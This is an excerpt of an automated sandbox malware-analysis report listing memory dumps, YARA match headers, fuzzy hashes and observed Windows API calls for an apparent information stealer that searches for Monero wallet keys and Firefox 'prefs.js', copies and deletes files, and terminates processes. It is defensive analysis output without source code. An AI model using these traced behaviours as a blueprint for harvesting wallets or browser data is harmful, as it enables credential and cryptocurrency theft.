                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 180737720-1013718255
                                    • Opcode ID: 5a42e385532321d189fc7b18208a1e9d4c0581ceb99d43e1db2ccc7088dc8c93
                                    • Instruction ID: 68d66da32f36266ad5067099ecd710276bff4debcfa69783264b850e85eecea4
                                    • Opcode Fuzzy Hash: 5a42e385532321d189fc7b18208a1e9d4c0581ceb99d43e1db2ccc7088dc8c93
                                    • Instruction Fuzzy Hash: 04E14F729111589ADB24FB61CDA2EEE73BDAF64300F4145E9B40A62192EF307F89CF51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                    • API String ID: 0-1562099544
                                    • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction ID: 69b976027ab9f553827f05f8c65ea484524638988ce69d8ed3af7ee585edbb82
                                    • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                    • Instruction Fuzzy Hash: 22E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BF16B0,00BF0D97), ref: 00BDF81E
                                    • StrCmpCA.SHLWAPI(?,00BF16B4), ref: 00BDF86F
                                    • StrCmpCA.SHLWAPI(?,00BF16B8), ref: 00BDF885
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BDFBB1
                                    • FindClose.KERNEL32(000000FF), ref: 00BDFBC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                     • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: 93b0062bcdad036c5f22a29f510a33f27519fb9db3e75fc5f29e1df18274d060
                                    • Instruction ID: 57fe01e3b284e9df17df65948657513c4a7eda1e19ef6a004c6fca8b7516af02
                                    • Opcode Fuzzy Hash: 93b0062bcdad036c5f22a29f510a33f27519fb9db3e75fc5f29e1df18274d060
                                    • Instruction Fuzzy Hash: 14B12071A001589BCB24FF75DD96BEDB7BDAF54300F0085E9A50A57291EF30AB48CB92
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BF523C,?,?,?,00BF52E4,?,?,00000000,?,00000000), ref: 00BD1963
                                    • StrCmpCA.SHLWAPI(?,00BF538C), ref: 00BD19B3
                                    • StrCmpCA.SHLWAPI(?,00BF5434), ref: 00BD19C9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BD1D80
                                    • DeleteFileA.KERNEL32(00000000), ref: 00BD1E0A
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BD1E60
                                    • FindClose.KERNEL32(000000FF), ref: 00BD1E72
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: 1f1454ec2f913298238cd9f54da0e89a73ddef2fecb4ebd58963e6d4d2384110
                                    • Instruction ID: 1a06f80b98e5194aeb99e06057ffaa1979062d880ab902817d1de24c4d334ca3
                                    • Opcode Fuzzy Hash: 1f1454ec2f913298238cd9f54da0e89a73ddef2fecb4ebd58963e6d4d2384110
                                    • Instruction Fuzzy Hash: B912ED71910158ABCB25FB71CCA6AEE77BDAF64300F4145E9A10A62191EF307B88CF61
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00BF0C32), ref: 00BDDF5E
                                    • StrCmpCA.SHLWAPI(?,00BF15C0), ref: 00BDDFAE
                                    • StrCmpCA.SHLWAPI(?,00BF15C4), ref: 00BDDFC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BDE4E0
                                    • FindClose.KERNEL32(000000FF), ref: 00BDE4F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 0c1d3d2e08f2733126dfffe84649cd00038a7b80cff2685479e464bc9af36e68
                                    • Instruction ID: 341a45cd9820c145d554aee032fe596190c694c91e00104770d2bf17e4ce01f8
                                    • Opcode Fuzzy Hash: 0c1d3d2e08f2733126dfffe84649cd00038a7b80cff2685479e464bc9af36e68
                                    • Instruction Fuzzy Hash: D2F1CC719141589ACB25FB71CDA5EEEB3BDAF24300F4145EAA10A62191EF307B89CF61
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BF15A8,00BF0BAF), ref: 00BDDBEB
                                    • StrCmpCA.SHLWAPI(?,00BF15AC), ref: 00BDDC33
                                    • StrCmpCA.SHLWAPI(?,00BF15B0), ref: 00BDDC49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BDDECC
                                    • FindClose.KERNEL32(000000FF), ref: 00BDDEDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 8a96bfae83905e1f36ce64bb87c90135e7de742c0c4f800746e927b8b9b5b0e3
                                    • Instruction ID: 96e7f1ebc39461d40fa96e52912609730f31501df8f29aa93a5b529f948e11f3
                                    • Opcode Fuzzy Hash: 8a96bfae83905e1f36ce64bb87c90135e7de742c0c4f800746e927b8b9b5b0e3
                                    • Instruction Fuzzy Hash: 15915372A002049BCB14FB75ED96AED77BDAF94300F0146E9B94656191FF34AB0CCB92
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BE9905
                                    • Process32First.KERNEL32(00BD9FDE,00000128), ref: 00BE9919
                                    • Process32Next.KERNEL32(00BD9FDE,00000128), ref: 00BE992E
                                    • StrCmpCA.SHLWAPI(?,00BD9FDE), ref: 00BE9943
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BE995C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BE997A
                                    • CloseHandle.KERNEL32(00000000), ref: 00BE9987
                                    • CloseHandle.KERNEL32(00BD9FDE), ref: 00BE9993
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: 89f295782d04830964b40ba4b0efb730d97d1647615face9428671b501985a85
                                    • Instruction ID: 0d1cde865e0cbcac448fe4699db7bfb391978dbecac091eeb08d0dd530988b29
                                    • Opcode Fuzzy Hash: 89f295782d04830964b40ba4b0efb730d97d1647615face9428671b501985a85
                                    • Instruction Fuzzy Hash: 3A11EFB5A04218AFDB24DFA6DC48BDDB7B9AB49701F0045CCF545B6250D774AA88CFA0
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00BF05B7), ref: 00BE7D71
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00BE7D89
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00BE7D9D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00BE7DF2
                                    • LocalFree.KERNEL32(00000000), ref: 00BE7EB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 27e37224c4a43026ee693a2cd1d299f92b48bccb9551d260b558ac6100805f90
                                    • Instruction ID: 5d6528ad66ace3776b864daa88e560efb109abe311105fb6cb78ae77313c25fc
                                    • Opcode Fuzzy Hash: 27e37224c4a43026ee693a2cd1d299f92b48bccb9551d260b558ac6100805f90
                                    • Instruction Fuzzy Hash: F1416271940258AFCB24DBA5DC99BEDB7B8FF58700F2041D9E00962291DB742F88CFA1
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00BF0D79), ref: 00BDE5A2
                                    • StrCmpCA.SHLWAPI(?,00BF15F0), ref: 00BDE5F2
                                    • StrCmpCA.SHLWAPI(?,00BF15F4), ref: 00BDE608
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BDECDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: c7cd21fd19482ead417ea5c4ab50a45ffb9e57b76d9f5077616ab87bc6a55461
                                    • Instruction ID: 7aa356a41e13998fa957f065a954d0ded82fa56e17e678b37606eec578595a50
                                    • Opcode Fuzzy Hash: c7cd21fd19482ead417ea5c4ab50a45ffb9e57b76d9f5077616ab87bc6a55461
                                    • Instruction Fuzzy Hash: 2D125E32A101589BCB14FB71DDA6AED73BDAF64300F4149E9B50A66191EF307B48CF52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :*o$F2{k$J3o~$Xj^$v}$~
                                    • API String ID: 0-142055222
                                    • Opcode ID: 158ee589904bbb08ca7e17e5e9e375c0c952ca67e0ba7548f3dd7cc92c0c1857
                                    • Instruction ID: 402acff686ce10e2b7aa2d1ee5d78ad67884892650273352d97b909e974be954
                                    • Opcode Fuzzy Hash: 158ee589904bbb08ca7e17e5e9e375c0c952ca67e0ba7548f3dd7cc92c0c1857
                                    • Instruction Fuzzy Hash: 9EB207F3A0C2049FE704AE2DDC8567ABBE9EF94220F16493DE6C5C7744EA3598058793
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: n/$VZ~m$e']f$lU]$zK$7ng
                                    • API String ID: 0-467099331
                                    • Opcode ID: 89ae350f9d437fd614c12e340686c5fb0b05994752c975b79a885d7e34d89eac
                                    • Instruction ID: c10af32d7d9ffeb185391fd94b3c35aada90476e4dc98e6d0737086d0246c7c0
                                    • Opcode Fuzzy Hash: 89ae350f9d437fd614c12e340686c5fb0b05994752c975b79a885d7e34d89eac
                                    • Instruction Fuzzy Hash: B8B207F3A082149FE704AE2DDC8567AFBE9EF94720F1A453DEAC4C3744EA3558058792
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 6"_/$7\p8$QNM$UFB$xq
                                    • API String ID: 0-2202299890
                                    • Opcode ID: f0df664f588171b9bef0b5ab6cf1cdd491fb79fdbe28e15402128b1c7ca5eaed
                                    • Instruction ID: 6534f5d8efec59af477cf717f730f04de4ffde79053e13ed2f2ad69f3acaa413
                                    • Opcode Fuzzy Hash: f0df664f588171b9bef0b5ab6cf1cdd491fb79fdbe28e15402128b1c7ca5eaed
                                    • Instruction Fuzzy Hash: A7B2E2F36082009FE304AE2DEC8577ABBE5EF94720F1A493DEAC4C7744E63598458796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 'y]$0?$R$e=an$9V
                                    • API String ID: 0-2018199918
                                    • Opcode ID: 9bcb79ef671cd3ad53918ef1175173af4ca3d2242bd97606b40a4531bd57f313
                                    • Instruction ID: ad11a54f860dcd6a1f6755f86381863a679ca924cb9dd95e8379f78a046ce2f4
                                    • Opcode Fuzzy Hash: 9bcb79ef671cd3ad53918ef1175173af4ca3d2242bd97606b40a4531bd57f313
                                    • Instruction Fuzzy Hash: F69218F3A0C2049FE304AE2DEC8577ABBE9EF94760F1A453DE6C4C3744E93598058696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmp
